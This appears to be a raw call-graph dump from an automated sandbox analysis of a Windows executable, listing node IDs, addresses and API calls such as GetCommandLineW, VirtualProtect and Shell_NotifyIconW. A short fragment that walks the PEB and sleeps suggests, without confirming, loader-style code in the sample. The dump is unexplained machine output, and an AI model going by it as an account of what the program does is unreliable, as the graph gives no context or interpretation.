94632 f2a717 94631->94632 94633 eed7f7 48 API calls 94631->94633 94632->94558 94633->94632 94634->94549 94635->94549 94636->94558 94637->94553 94638->94545 94639->94553 94640->94553 94641->94566 94642->94560 94643->94575 94645 ee936c 81 API calls 94644->94645 94646 f3f8ea 94645->94646 94653 f3f92c Mailbox 94646->94653 94680 f40567 94646->94680 94648 f3f984 Mailbox 94649 f3fb8b 94648->94649 94648->94653 94656 ee936c 81 API calls 94648->94656 94722 f429e8 48 API calls ___crtGetEnvironmentStringsW 94648->94722 94723 f3fda5 60 API calls 2 library calls 94648->94723 94650 f3fb95 94649->94650 94651 f3fcfa 94649->94651 94693 f3f70a 94650->94693 94727 f40688 89 API calls Mailbox 94651->94727 94653->94588 94655 f3fd07 94655->94650 94657 f3fd13 94655->94657 94656->94648 94657->94653 94662 f3fbc9 94707 efed18 94662->94707 94665 f3fbe3 94724 f2cc5c 86 API calls 4 library calls 94665->94724 94666 f3fbfd 94711 efc050 94666->94711 94669 f3fbee GetCurrentProcess TerminateProcess 94669->94666 94670 f3fc14 94672 ef1b90 48 API calls 94670->94672 94679 f3fc3e 94670->94679 94671 f3fd65 94671->94653 94676 f3fd7e FreeLibrary 94671->94676 94673 f3fc2d 94672->94673 94725 f4040f 105 API calls _free 94673->94725 94674 ef1b90 48 API calls 94674->94679 94676->94653 94679->94671 94679->94674 94726 eedcae 50 API calls Mailbox 94679->94726 94728 f4040f 105 API calls _free 94679->94728 94681 eebdfa 48 API calls 94680->94681 94682 f40582 CharLowerBuffW 94681->94682 94729 f21f11 94682->94729 94686 eed7f7 48 API calls 94688 f405bb 94686->94688 94687 f4061a Mailbox 94687->94648 94736 ee69e9 48 API calls ___crtGetEnvironmentStringsW 94688->94736 94690 f405d2 94691 eeb18b 48 API calls 94690->94691 94692 f405de Mailbox 94691->94692 94692->94687 94737 f3fda5 60 API calls 2 library calls 94692->94737 94694 f3f725 94693->94694 94695 f3f77a 94693->94695 94696 eff4ea 48 API calls 94694->94696 94699 f40828 94695->94699 94698 f3f747 94696->94698 94697 eff4ea 48 API calls 94697->94698 94698->94695 94698->94697 94700 f40a53 Mailbox 94699->94700 94706 f4084b _strcat _wcscpy __wsetenvp 94699->94706 94700->94662 94701 eed286 48 API calls 94701->94706 94702 eecf93 58 API calls 94702->94706 94703 f0395c 47 API calls __crtLCMapStringA_stat 94703->94706 94704 ee936c 81 API calls 94704->94706 94706->94700 94706->94701 94706->94702 94706->94703 94706->94704 94740 f28035 50 API calls __wsetenvp 94706->94740 94708 efed2d 94707->94708 94709 efedc5 VirtualProtect 94708->94709 94710 efed93 94708->94710 94709->94710 94710->94665 94710->94666 94712 efc064 94711->94712 94714 efc069 Mailbox 94711->94714 94713 efc1af 48 API calls 94712->94713 94713->94714 94716 efc077 94714->94716 94741 efc15c 48 API calls 94714->94741 94717 eff4ea 48 API calls 94716->94717 94718 efc152 94716->94718 94719 efc108 94717->94719 94718->94670 94720 eff4ea 48 API calls 94719->94720 94721 efc113 94720->94721 94721->94670 94722->94648 94723->94648 94724->94669 94725->94679 94726->94679 94727->94655 94728->94679 94730 f21f3b __wsetenvp 94729->94730 94731 f21f79 94730->94731 94732 f21ffa 94730->94732 94733 f21f6f 94730->94733 94731->94686 94731->94692 94732->94731 94739 efd37a 60 API calls 94732->94739 94733->94731 94738 efd37a 60 API calls 94733->94738 94736->94690 94737->94687 94738->94733 94739->94732 94740->94706 94741->94716 94743 f2a5ee 94742->94743 94744 f2a4ec 94742->94744 94743->94592 94745 f2a5d4 Mailbox 94744->94745 94747 f2a58b 94744->94747 94750 f2a4fd 94744->94750 94746 eff4ea 48 API calls 94745->94746 94757 f2a54c Mailbox ___crtGetEnvironmentStringsW 94746->94757 94748 eff4ea 48 API calls 94747->94748 94748->94757 94749 f2a51a 94753 f2a555 94749->94753 94754 f2a545 94749->94754 94749->94757 94750->94749 94752 eff4ea 48 API calls 94750->94752 94751 eff4ea 48 API calls 94751->94743 94752->94749 94756 eff4ea 48 API calls 94753->94756 94755 eff4ea 48 API calls 94754->94755 94755->94757 94758 f2a55b 94756->94758 94757->94751 94762 f29d2d 48 API calls 94758->94762 94760 f2a567 94763 efe65e 50 API calls 94760->94763 94762->94760 94763->94757 94764->94615 94766 ee511f 94765->94766 94767 f51be7 94765->94767 94775 eeb384 94766->94775 94784 f1a58f 48 API calls ___crtGetEnvironmentStringsW 94767->94784 94770 ee512b 94770->94605 94771 f51bf1 94772 ee6eed 48 API calls 94771->94772 94773 f51bf9 Mailbox 94772->94773 94774->94606 94776 eeb392 94775->94776 94777 eeb3c5 ___crtGetEnvironmentStringsW 94775->94777 94776->94777 94778 eeb3fd 94776->94778 94779 eeb3b8 94776->94779 94777->94770 94777->94777 94780 eff4ea 48 API calls 94778->94780 94781 eebb85 48 API calls 94779->94781 94782 eeb407 94780->94782 94781->94777 94783 eff4ea 48 API calls 94782->94783 94783->94777 94784->94771 94785 ee3742 94786 ee374b 94785->94786 94787 ee37c8 94786->94787 94788 ee3769 94786->94788 94824 ee37c6 94786->94824 94790 ee37ce 94787->94790 94791 f51e00 94787->94791 94792 ee382c PostQuitMessage 94788->94792 94793 ee3776 94788->94793 94789 ee37ab DefWindowProcW 94816 ee37b9 94789->94816 94796 ee37f6 SetTimer RegisterWindowMessageW 94790->94796 94797 ee37d3 94790->94797 94840 ee2ff6 16 API calls 94791->94840 94792->94816 94794 f51e88 94793->94794 94795 ee3781 94793->94795 94846 f24ddd 60 API calls _memset 94794->94846 94800 ee3789 94795->94800 94801 ee3836 94795->94801 94802 ee381f CreatePopupMenu 94796->94802 94796->94816 94804 ee37da KillTimer 94797->94804 94805 f51da3 94797->94805 94799 f51e27 94841 efe312 331 API calls Mailbox 94799->94841 94807 f51e6d 94800->94807 94808 ee3794 94800->94808 94830 efeb83 94801->94830 94802->94816 94837 ee3847 Shell_NotifyIconW _memset 94804->94837 94811 f51ddc MoveWindow 94805->94811 94812 f51da8 94805->94812 94807->94789 94845 f1a5f3 48 API calls 94807->94845 94814 ee379f 94808->94814 94815 f51e58 94808->94815 94809 f51e9a 94809->94789 94809->94816 94811->94816 94817 f51dac 94812->94817 94818 f51dcb SetFocus 94812->94818 94814->94789 94842 ee3847 Shell_NotifyIconW _memset 94814->94842 94844 f255bd 70 API calls _memset 94815->94844 94817->94814 94820 f51db5 94817->94820 94818->94816 94819 ee37ed 94838 ee390f DeleteObject DestroyWindow Mailbox 94819->94838 94839 ee2ff6 16 API calls 94820->94839 94824->94789 94826 f51e68 94826->94816 94828 f51e4c 94843 ee4ffc 67 API calls _memset 94828->94843 94831 efec1c 94830->94831 94832 efeb9a _memset 94830->94832 94831->94816 94847 ee51af 94832->94847 94834 efec05 KillTimer SetTimer 94834->94831 94835 efebc1 94835->94834 94836 f53c7a Shell_NotifyIconW 94835->94836 94836->94834 94837->94819 94838->94816 94839->94816 94840->94799 94841->94814 94842->94828 94843->94824 94844->94826 94845->94824 94846->94809 94848 ee51cb 94847->94848 94849 ee52a2 Mailbox 94847->94849 94850 ee6b0f 48 API calls 94848->94850 94849->94835 94851 ee51d9 94850->94851 94852 f53ca1 LoadStringW 94851->94852 94853 ee51e6 94851->94853 94856 f53cbb 94852->94856 94854 ee6a63 48 API calls 94853->94854 94855 ee51fb 94854->94855 94855->94856 94857 ee520c 94855->94857 94858 ee510d 48 API calls 94856->94858 94859 ee5216 94857->94859 94860 ee52a7 94857->94860 94863 f53cc5 94858->94863 94862 ee510d 48 API calls 94859->94862 94861 ee6eed 48 API calls 94860->94861 94866 ee5220 _memset _wcscpy 94861->94866 94862->94866 94864 ee518c 48 API calls 94863->94864 94863->94866 94865 f53ce7 94864->94865 94867 ee518c 48 API calls 94865->94867 94868 ee5288 Shell_NotifyIconW 94866->94868 94867->94866 94868->94849 94869 f58eb8 94873 f2a635 94869->94873 94871 f58ec3 94872 f2a635 84 API calls 94871->94872 94872->94871 94879 f2a66f 94873->94879 94881 f2a642 94873->94881 94874 f2a671 94885 efec4e 81 API calls 94874->94885 94876 f2a676 94877 ee936c 81 API calls 94876->94877 94878 f2a67d 94877->94878 94880 ee510d 48 API calls 94878->94880 94879->94871 94880->94879 94881->94874 94881->94876 94881->94879 94882 f2a669 94881->94882 94884 ef4525 61 API calls ___crtGetEnvironmentStringsW 94882->94884 94884->94879 94885->94876 94886 f05dfd 94887 f05e09 __wsopen_helper 94886->94887 94923 f07eeb GetStartupInfoW 94887->94923 94890 f05e0e 94925 f09ca7 GetProcessHeap 94890->94925 94891 f05e66 94892 f05e71 94891->94892 95010 f05f4d 47 API calls 3 library calls 94891->95010 94926 f07b47 94892->94926 94895 f05e77 94896 f05e82 __RTC_Initialize 94895->94896 95011 f05f4d 47 API calls 3 library calls 94895->95011 94947 f0acb3 94896->94947 94899 f05e91 94900 f05e9d GetCommandLineW 94899->94900 95012 f05f4d 47 API calls 3 library calls 94899->95012 94966 f12e7d GetEnvironmentStringsW 94900->94966 94904 f05e9c 94904->94900 94907 f05ec2 94979 f12cb4 94907->94979 94910 f05ec8 94911 f05ed3 94910->94911 95014 f0115b 47 API calls 3 library calls 94910->95014 94993 f01195 94911->94993 94914 f05edb 94915 f05ee6 __wwincmdln 94914->94915 95015 f0115b 47 API calls 3 library calls 94914->95015 94997 ee3a0f 94915->94997 94918 f05efa 94919 f05f09 94918->94919 95016 f013f1 47 API calls _doexit 94918->95016 95017 f01186 47 API calls _doexit 94919->95017 94922 f05f0e __wsopen_helper 94924 f07f01 94923->94924 94924->94890 94925->94891 95018 f0123a 30 API calls 2 library calls 94926->95018 94928 f07b4c 95019 f07e23 InitializeCriticalSectionAndSpinCount 94928->95019 94930 f07b51 94931 f07b55 94930->94931 95021 f07e6d TlsAlloc 94930->95021 95020 f07bbd 50 API calls 2 library calls 94931->95020 94934 f07b5a 94934->94895 94935 f07b67 94935->94931 94936 f07b72 94935->94936 95022 f06986 94936->95022 94939 f07bb4 95030 f07bbd 50 API calls 2 library calls 94939->95030 94942 f07bb9 94942->94895 94943 f07b93 94943->94939 94944 f07b99 94943->94944 95029 f07a94 47 API calls 4 library calls 94944->95029 94946 f07ba1 GetCurrentThreadId 94946->94895 94948 f0acbf __wsopen_helper 94947->94948 94949 f07cf4 __lock 47 API calls 94948->94949 94950 f0acc6 94949->94950 94951 f06986 __calloc_crt 47 API calls 94950->94951 94952 f0acd7 94951->94952 94953 f0ad42 GetStartupInfoW 94952->94953 94954 f0ace2 __wsopen_helper @_EH4_CallFilterFunc@8 94952->94954 94958 f0ad57 94953->94958 94962 f0ae80 94953->94962 94954->94899 94955 f0af44 95039 f0af58 LeaveCriticalSection _doexit 94955->95039 94957 f0ada5 94957->94962 94964 f0ade5 InitializeCriticalSectionAndSpinCount 94957->94964 94965 f0add7 GetFileType 94957->94965 94958->94957 94960 f06986 __calloc_crt 47 API calls 94958->94960 94958->94962 94959 f0aec9 GetStdHandle 94959->94962 94960->94958 94961 f0aedb GetFileType 94961->94962 94962->94955 94962->94959 94962->94961 94963 f0af08 InitializeCriticalSectionAndSpinCount 94962->94963 94963->94962 94964->94957 94965->94957 94965->94964 94967 f05ead 94966->94967 94968 f12e8e 94966->94968 94973 f12a7b GetModuleFileNameW 94967->94973 95040 f069d0 47 API calls __crtLCMapStringA_stat 94968->95040 94971 f12eb4 ___crtGetEnvironmentStringsW 94972 f12eca FreeEnvironmentStringsW 94971->94972 94972->94967 94974 f12aaf _wparse_cmdline 94973->94974 94975 f05eb7 94974->94975 94976 f12ae9 94974->94976 94975->94907 95013 f0115b 47 API calls 3 library calls 94975->95013 95041 f069d0 47 API calls __crtLCMapStringA_stat 94976->95041 94978 f12aef _wparse_cmdline 94978->94975 94980 f12ccd __wsetenvp 94979->94980 94981 f12cc5 94979->94981 94982 f06986 __calloc_crt 47 API calls 94980->94982 94981->94910 94986 f12cf6 __wsetenvp 94982->94986 94983 f12d4d 94984 f01c9d _free 47 API calls 94983->94984 94984->94981 94985 f06986 __calloc_crt 47 API calls 94985->94986 94986->94981 94986->94983 94986->94985 94987 f12d72 94986->94987 94990 f12d89 94986->94990 95042 f12567 47 API calls __ftell_nolock 94986->95042 94988 f01c9d _free 47 API calls 94987->94988 94988->94981 95043 f06e20 IsProcessorFeaturePresent 94990->95043 94992 f12d95 94992->94910 94994 f011a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94993->94994 94996 f011e0 __IsNonwritableInCurrentImage 94994->94996 95058 f00f0a 52 API calls __cinit 94994->95058 94996->94914 94998 ee3a29 94997->94998 94999 f51ebf 94997->94999 95000 ee3a63 IsThemeActive 94998->95000 95059 f01405 95000->95059 95004 ee3a8f 95071 ee3adb SystemParametersInfoW SystemParametersInfoW 95004->95071 95006 ee3a9b 95072 ee3d19 95006->95072 95008 ee3aa3 SystemParametersInfoW 95009 ee3ac8 95008->95009 95009->94918 95010->94892 95011->94896 95012->94904 95016->94919 95017->94922 95018->94928 95019->94930 95020->94934 95021->94935 95024 f0698d 95022->95024 95025 f069ca 95024->95025 95026 f069ab Sleep 95024->95026 95031 f130aa 95024->95031 95025->94939 95028 f07ec9 TlsSetValue 95025->95028 95027 f069c2 95026->95027 95027->95024 95027->95025 95028->94943 95029->94946 95030->94942 95032 f130b5 95031->95032 95036 f130d0 __calloc_impl 95031->95036 95033 f130c1 95032->95033 95032->95036 95038 f07c0e 47 API calls __getptd_noexit 95033->95038 95035 f130e0 HeapAlloc 95035->95036 95037 f130c6 95035->95037 95036->95035 95036->95037 95037->95024 95038->95037 95039->94954 95040->94971 95041->94978 95042->94986 95044 f06e2b 95043->95044 95049 f06cb5 95044->95049 95048 f06e46 95048->94992 95050 f06ccf _memset __call_reportfault 95049->95050 95051 f06cef IsDebuggerPresent 95050->95051 95057 f081ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95051->95057 95053 f06db3 __call_reportfault 95054 f0a70c __ftell_nolock 6 API calls 95053->95054 95055 f06dd6 95054->95055 95056 f08197 GetCurrentProcess TerminateProcess 95055->95056 95056->95048 95057->95053 95058->94996 95060 f07cf4 __lock 47 API calls 95059->95060 95061 f01410 95060->95061 95124 f07e58 LeaveCriticalSection 95061->95124 95063 ee3a88 95064 f0146d 95063->95064 95065 f01491 95064->95065 95066 f01477 95064->95066 95065->95004 95066->95065 95125 f07c0e 47 API calls __getptd_noexit 95066->95125 95068 f01481 95126 f06e10 8 API calls __ftell_nolock 95068->95126 95070 f0148c 95070->95004 95071->95006 95073 ee3d26 __ftell_nolock 95072->95073 95074 eed7f7 48 API calls 95073->95074 95075 ee3d31 GetCurrentDirectoryW 95074->95075 95127 ee61ca 95075->95127 95077 ee3d57 IsDebuggerPresent 95078 f51cc1 MessageBoxA 95077->95078 95079 ee3d65 95077->95079 95082 f51cd9 95078->95082 95080 ee3e3a 95079->95080 95079->95082 95083 ee3d82 95079->95083 95081 ee3e41 SetCurrentDirectoryW 95080->95081 95084 ee3e4e Mailbox 95081->95084 95243 efc682 48 API calls 95082->95243 95201 ee40e5 95083->95201 95084->95008 95087 f51ce9 95093 f51cff SetCurrentDirectoryW 95087->95093 95093->95084 95124->95063 95125->95068 95126->95070 95245 efe99b 95127->95245 95131 ee61eb 95132 ee5374 50 API calls 95131->95132 95133 ee61ff 95132->95133 95134 eece19 48 API calls 95133->95134 95135 ee620c 95134->95135 95262 ee39db 95135->95262 95137 ee6216 Mailbox 95138 ee6eed 48 API calls 95137->95138 95139 ee622b 95138->95139 95274 ee9048 95139->95274 95142 eece19 48 API calls 95143 ee6244 95142->95143 95144 eed6e9 55 API calls 95143->95144 95145 ee6254 Mailbox 95144->95145 95146 eece19 48 API calls 95145->95146 95147 ee627c 95146->95147 95148 eed6e9 55 API calls 95147->95148 95149 ee628f Mailbox 95148->95149 95150 eece19 48 API calls 95149->95150 95151 ee62a0 95150->95151 95152 eed645 53 API calls 95151->95152 95153 ee62b2 Mailbox 95152->95153 95154 eed7f7 48 API calls 95153->95154 95155 ee62c5 95154->95155 95277 ee63fc 95155->95277 95159 ee62df 95160 ee62e9 95159->95160 95161 f51c08 95159->95161 95163 f00fa7 _W_store_winword 59 API calls 95160->95163 95162 ee63fc 48 API calls 95161->95162 95164 f51c1c 95162->95164 95165 ee62f4 95163->95165 95168 ee63fc 48 API calls 95164->95168 95165->95164 95166 ee62fe 95165->95166 95167 f00fa7 _W_store_winword 59 API calls 95166->95167 95169 ee6309 95167->95169 95170 f51c38 95168->95170 95169->95170 95171 ee6313 95169->95171 95173 ee5374 50 API calls 95170->95173 95172 f00fa7 _W_store_winword 59 API calls 95171->95172 95174 ee631e 95172->95174 95175 f51c5d 95173->95175 95176 ee635f 95174->95176 95179 f51c86 95174->95179 95182 ee63fc 48 API calls 95174->95182 95177 ee63fc 48 API calls 95175->95177 95176->95179 95180 ee636c 95176->95180 95178 f51c69 95177->95178 95181 ee6eed 48 API calls 95178->95181 95183 ee6eed 48 API calls 95179->95183 95187 efc050 48 API calls 95180->95187 95184 f51c77 95181->95184 95185 ee6342 95182->95185 95186 f51ca8 95183->95186 95189 ee63fc 48 API calls 95184->95189 95190 ee6eed 48 API calls 95185->95190 95191 ee63fc 48 API calls 95186->95191 95188 ee6384 95187->95188 95192 ef1b90 48 API calls 95188->95192 95189->95179 95193 ee6350 95190->95193 95194 f51cb5 95191->95194 95198 ee6394 95192->95198 95195 ee63fc 48 API calls 95193->95195 95194->95194 95195->95176 95196 ef1b90 48 API calls 95196->95198 95198->95196 95199 ee63fc 48 API calls 95198->95199 95200 ee63d6 Mailbox 95198->95200 95293 ee6b68 48 API calls 95198->95293 95199->95198 95200->95077 95202 ee40f2 __ftell_nolock 95201->95202 95203 ee410b 95202->95203 95204 f5370e _memset 95202->95204 95205 ee660f 49 API calls 95203->95205 95206 f5372a GetOpenFileNameW 95204->95206 95207 ee4114 95205->95207 95208 f53779 95206->95208 95336 ee40a7 95207->95336 95210 ee6a63 48 API calls 95208->95210 95212 f5378e 95210->95212 95212->95212 95214 ee4129 95354 ee4139 95214->95354 95243->95087 95246 eed7f7 48 API calls 95245->95246 95247 ee61db 95246->95247 95248 ee6009 95247->95248 95249 ee6016 __ftell_nolock 95248->95249 95250 ee6a63 48 API calls 95249->95250 95255 ee617c Mailbox 95249->95255 95252 ee6048 95250->95252 95260 ee607e Mailbox 95252->95260 95294 ee61a6 95252->95294 95253 ee61a6 48 API calls 95253->95260 95254 ee614f 95254->95255 95256 eece19 48 API calls 95254->95256 95255->95131 95258 ee6170 95256->95258 95257 eece19 48 API calls 95257->95260 95259 ee64cf 48 API calls 95258->95259 95259->95255 95260->95253 95260->95254 95260->95255 95260->95257 95261 ee64cf 48 API calls 95260->95261 95261->95260 95263 ee41a9 136 API calls 95262->95263 95264 ee39fe 95263->95264 95265 ee3a06 95264->95265 95297 f2c396 95264->95297 95265->95137 95268 f52ff0 95270 f01c9d _free 47 API calls 95268->95270 95269 ee4252 84 API calls 95269->95268 95271 f52ffd 95270->95271 95272 ee4252 84 API calls 95271->95272 95273 f53006 95272->95273 95273->95273 95275 eff4ea 48 API calls 95274->95275 95276 ee6237 95275->95276 95276->95142 95278 ee641f 95277->95278 95279 ee6406 95277->95279 95280 ee6a63 48 API calls 95278->95280 95281 ee6eed 48 API calls 95279->95281 95282 ee62d1 95280->95282 95281->95282 95283 f00fa7 95282->95283 95284 f00fb3 95283->95284 95285 f01028 95283->95285 95292 f00fd8 95284->95292 95333 f07c0e 47 API calls __getptd_noexit 95284->95333 95335 f0103a 59 API calls 3 library calls 95285->95335 95288 f01035 95288->95159 95289 f00fbf 95334 f06e10 8 API calls __ftell_nolock 95289->95334 95291 f00fca 95291->95159 95292->95159 95293->95198 95295 eebdfa 48 API calls 95294->95295 95296 ee61b1 95295->95296 95296->95252 95298 ee4517 83 API calls 95297->95298 95299 f2c405 95298->95299 95300 f2c56d 94 API calls 95299->95300 95301 f2c417 95300->95301 95302 ee44ed 64 API calls 95301->95302 95328 f2c41b 95301->95328 95303 f2c432 95302->95303 95304 ee44ed 64 API calls 95303->95304 95305 f2c442 95304->95305 95306 ee44ed 64 API calls 95305->95306 95307 f2c45d 95306->95307 95308 ee44ed 64 API calls 95307->95308 95309 f2c478 95308->95309 95310 ee4517 83 API calls 95309->95310 95311 f2c48f 95310->95311 95312 f0395c __crtLCMapStringA_stat 47 API calls 95311->95312 95313 f2c496 95312->95313 95314 f0395c __crtLCMapStringA_stat 47 API calls 95313->95314 95315 f2c4a0 95314->95315 95316 ee44ed 64 API calls 95315->95316 95317 f2c4b4 95316->95317 95318 f2bf5a GetSystemTimeAsFileTime 95317->95318 95319 f2c4c7 95318->95319 95320 f2c4f1 95319->95320 95321 f2c4dc 95319->95321 95323 f2c556 95320->95323 95324 f2c4f7 95320->95324 95322 f01c9d _free 47 API calls 95321->95322 95326 f2c4e2 95322->95326 95325 f01c9d _free 47 API calls 95323->95325 95332 f2b965 118 API calls __fcloseall 95324->95332 95325->95328 95329 f01c9d _free 47 API calls 95326->95329 95328->95268 95328->95269 95329->95328 95330 f2c54e 95331 f01c9d _free 47 API calls 95330->95331 95331->95328 95332->95330 95333->95289 95334->95291 95335->95288 95337 f0f8a0 __ftell_nolock 95336->95337 95338 ee40b4 GetLongPathNameW 95337->95338 95339 ee6a63 48 API calls 95338->95339 95340 ee40dc 95339->95340 95341 ee49a0 95340->95341 95342 eed7f7 48 API calls 95341->95342 95343 ee49b2 95342->95343 95344 ee660f 49 API calls 95343->95344 95345 ee49bd 95344->95345 95346 f52e35 95345->95346 95347 ee49c8 95345->95347 95352 f52e4f 95346->95352 95394 efd35e 60 API calls 95346->95394 95348 ee64cf 48 API calls 95347->95348 95350 ee49d4 95348->95350 95388 ee28a6 95350->95388 95353 ee49e7 Mailbox 95353->95214 95355 ee41a9 136 API calls 95354->95355 95356 ee415e 95355->95356 95357 f53489 95356->95357 95359 ee41a9 136 API calls 95356->95359 95358 f2c396 122 API calls 95357->95358 95360 f5349e 95358->95360 95361 ee4172 95359->95361 95362 f534a2 95360->95362 95363 f534bf 95360->95363 95361->95357 95364 ee417a 95361->95364 95365 ee4252 84 API calls 95362->95365 95366 eff4ea 48 API calls 95363->95366 95367 ee4186 95364->95367 95368 f534aa 95364->95368 95365->95368 95387 f53504 Mailbox 95366->95387 95395 eec833 95367->95395 95489 f26b49 87 API calls _wprintf 95368->95489 95371 f534b8 95371->95363 95373 f536b4 95374 f01c9d _free 47 API calls 95373->95374 95375 f536bc 95374->95375 95376 ee4252 84 API calls 95375->95376 95381 f536c5 95376->95381 95377 eeba85 48 API calls 95377->95387 95380 f01c9d _free 47 API calls 95380->95381 95381->95380 95383 ee4252 84 API calls 95381->95383 95493 f225b5 86 API calls 4 library calls 95381->95493 95383->95381 95384 eece19 48 API calls 95384->95387 95387->95373 95387->95377 95387->95381 95387->95384 95483 ee4dd9 95387->95483 95490 f22551 48 API calls ___crtGetEnvironmentStringsW 95387->95490 95491 f22472 60 API calls 2 library calls 95387->95491 95492 f29c12 48 API calls 95387->95492 95389 ee28b8 95388->95389 95393 ee28d7 ___crtGetEnvironmentStringsW 95388->95393 95392 eff4ea 48 API calls 95389->95392 95390 eff4ea 48 API calls 95391 ee28ee 95390->95391 95391->95353 95392->95393 95393->95390 95394->95346 95396 eec843 __ftell_nolock 95395->95396 95397 f53095 95396->95397 95398 eec860 95396->95398 95515 f225b5 86 API calls 4 library calls 95397->95515 95499 ee48ba 49 API calls 95398->95499 95401 eec882 95500 ee4550 56 API calls 95401->95500 95402 f530a8 95516 f225b5 86 API calls 4 library calls 95402->95516 95404 eec897 95404->95402 95405 eec89f 95404->95405 95408 eed7f7 48 API calls 95405->95408 95407 f530c4 95437 eec90c 95407->95437 95409 eec8ab 95408->95409 95501 efe968 49 API calls __ftell_nolock 95409->95501 95411 f530d7 95415 ee4907 CloseHandle 95411->95415 95412 eec91a 95414 f01dfc __wsplitpath 47 API calls 95412->95414 95413 eec8b7 95416 eed7f7 48 API calls 95413->95416 95422 eec943 _wcscat _wcscpy 95414->95422 95417 f530e3 95415->95417 95418 eec8c3 95416->95418 95419 ee41a9 136 API calls 95417->95419 95420 ee660f 49 API calls 95418->95420 95424 f5310d 95419->95424 95421 eec8d1 95420->95421 95502 efeb66 SetFilePointerEx ReadFile 95421->95502 95426 eec96d SetCurrentDirectoryW 95422->95426 95423 f53136 95517 f225b5 86 API calls 4 library calls 95423->95517 95424->95423 95427 f2c396 122 API calls 95424->95427 95430 eff4ea 48 API calls 95426->95430 95431 f53129 95427->95431 95428 eec8fd 95434 eec988 95430->95434 95435 f53131 95431->95435 95436 f53152 95431->95436 95433 f5314d 95466 eecad1 Mailbox 95433->95466 95439 ee47b7 48 API calls 95434->95439 95440 ee4252 84 API calls 95435->95440 95438 ee4252 84 API calls 95436->95438 95437->95411 95437->95412 95441 f53157 95438->95441 95470 eec993 Mailbox __wsetenvp 95439->95470 95440->95423 95442 eff4ea 48 API calls 95441->95442 95443 eeca9d 95511 ee4907 95443->95511 95454 f53467 95526 f225b5 86 API calls 4 library calls 95454->95526 95464 f5345f 95525 f2240b 48 API calls 3 library calls 95464->95525 95494 ee48dd 95466->95494 95467 eece19 48 API calls 95467->95470 95470->95443 95470->95454 95470->95464 95470->95467 95504 eeb337 56 API calls _wcscpy 95470->95504 95505 efc258 GetStringTypeW 95470->95505 95506 eecb93 59 API calls __wcsnicmp 95470->95506 95507 eecb5a GetStringTypeW __wsetenvp 95470->95507 95508 f016d0 GetStringTypeW __towlower_l 95470->95508 95509 eecc24 162 API calls 3 library calls 95470->95509 95510 efc682 48 API calls 95470->95510 95484 ee4dec 95483->95484 95488 ee4e9a 95483->95488 95485 eff4ea 48 API calls 95484->95485 95487 ee4e1e 95484->95487 95485->95487 95486 eff4ea 48 API calls 95486->95487 95487->95486 95487->95488 95488->95387 95489->95371 95490->95387 95491->95387 95492->95387 95493->95381 95499->95401 95500->95404 95501->95413 95502->95428 95504->95470 95505->95470 95506->95470 95507->95470 95508->95470 95509->95470 95510->95470 95515->95402 95516->95407 95517->95433 95525->95454 95546 1058088 95560 1055cd8 95546->95560 95548 105815a 95563 1057f78 95548->95563 95566 1059188 GetPEB 95560->95566 95562 1056363 95562->95548 95564 1057f81 Sleep 95563->95564 95565 1057f8f 95564->95565 95567 10591b2 95566->95567 95567->95562 95568 f519cb 95573 ee2322 95568->95573 95570 f519d1 95606 f00f0a 52 API calls __cinit 95570->95606 95572 f519db 95574 ee2344 95573->95574 95607 ee26df 95574->95607 95579 eed7f7 48 API calls 95580 ee2384 95579->95580 95581 eed7f7 48 API calls 95580->95581 95582 ee238e 95581->95582 95583 eed7f7 48 API calls 95582->95583 95584 ee2398 95583->95584 95585 eed7f7 48 API calls 95584->95585 95586 ee23de 95585->95586 95587 eed7f7 48 API calls 95586->95587 95588 ee24c1 95587->95588 95615 ee263f 95588->95615 95592 ee24f1 95593 eed7f7 48 API calls 95592->95593 95594 ee24fb 95593->95594 95644 ee2745 95594->95644 95596 ee2546 95597 ee2556 GetStdHandle 95596->95597 95598 f5501d 95597->95598 95599 ee25b1 95597->95599 95598->95599 95601 f55026 95598->95601 95600 ee25b7 CoInitialize 95599->95600 95600->95570 95651 f292d4 53 API calls 95601->95651 95603 f5502d 95652 f299f9 CreateThread 95603->95652 95605 f55039 CloseHandle 95605->95600 95606->95572 95653 ee2854 95607->95653 95610 ee6a63 48 API calls 95611 ee234a 95610->95611 95612 ee272e 95611->95612 95667 ee27ec 6 API calls 95612->95667 95614 ee237a 95614->95579 95616 eed7f7 48 API calls 95615->95616 95617 ee264f 95616->95617 95618 eed7f7 48 API calls 95617->95618 95619 ee2657 95618->95619 95668 ee26a7 95619->95668 95622 ee26a7 48 API calls 95623 ee2667 95622->95623 95624 eed7f7 48 API calls 95623->95624 95625 ee2672 95624->95625 95626 eff4ea 48 API calls 95625->95626 95627 ee24cb 95626->95627 95628 ee22a4 95627->95628 95629 ee22b2 95628->95629 95630 eed7f7 48 API calls 95629->95630 95631 ee22bd 95630->95631 95632 eed7f7 48 API calls 95631->95632 95633 ee22c8 95632->95633 95634 eed7f7 48 API calls 95633->95634 95635 ee22d3 95634->95635 95636 eed7f7 48 API calls 95635->95636 95637 ee22de 95636->95637 95638 ee26a7 48 API calls 95637->95638 95639 ee22e9 95638->95639 95640 eff4ea 48 API calls 95639->95640 95641 ee22f0 95640->95641 95642 f51fe7 95641->95642 95643 ee22f9 RegisterWindowMessageW 95641->95643 95643->95592 95645 f55f4d 95644->95645 95646 ee2755 95644->95646 95673 f2c942 50 API calls 95645->95673 95648 eff4ea 48 API calls 95646->95648 95650 ee275d 95648->95650 95649 f55f58 95650->95596 95651->95603 95652->95605 95674 f299df 54 API calls 95652->95674 95660 ee2870 95653->95660 95656 ee2870 48 API calls 95657 ee2864 95656->95657 95658 eed7f7 48 API calls 95657->95658 95659 ee2716 95658->95659 95659->95610 95661 eed7f7 48 API calls 95660->95661 95662 ee287b 95661->95662 95663 eed7f7 48 API calls 95662->95663 95664 ee2883 95663->95664 95665 eed7f7 48 API calls 95664->95665 95666 ee285c 95665->95666 95666->95656 95667->95614 95669 eed7f7 48 API calls 95668->95669 95670 ee26b0 95669->95670 95671 eed7f7 48 API calls 95670->95671 95672 ee265f 95671->95672 95672->95622 95673->95649 95675 f5197b 95680 efdd94 95675->95680 95679 f5198a 95681 eff4ea 48 API calls 95680->95681 95683 efdd9c 95681->95683 95682 efddb0 95687 f00f0a 52 API calls __cinit 95682->95687 95683->95682 95688 efdf3d 95683->95688 95687->95679 95689 efdda8 95688->95689 95690 efdf46 95688->95690 95692 efddc0 95689->95692 95720 f00f0a 52 API calls __cinit 95690->95720 95693 eed7f7 48 API calls 95692->95693 95694 efddd7 GetVersionExW 95693->95694 95695 ee6a63 48 API calls 95694->95695 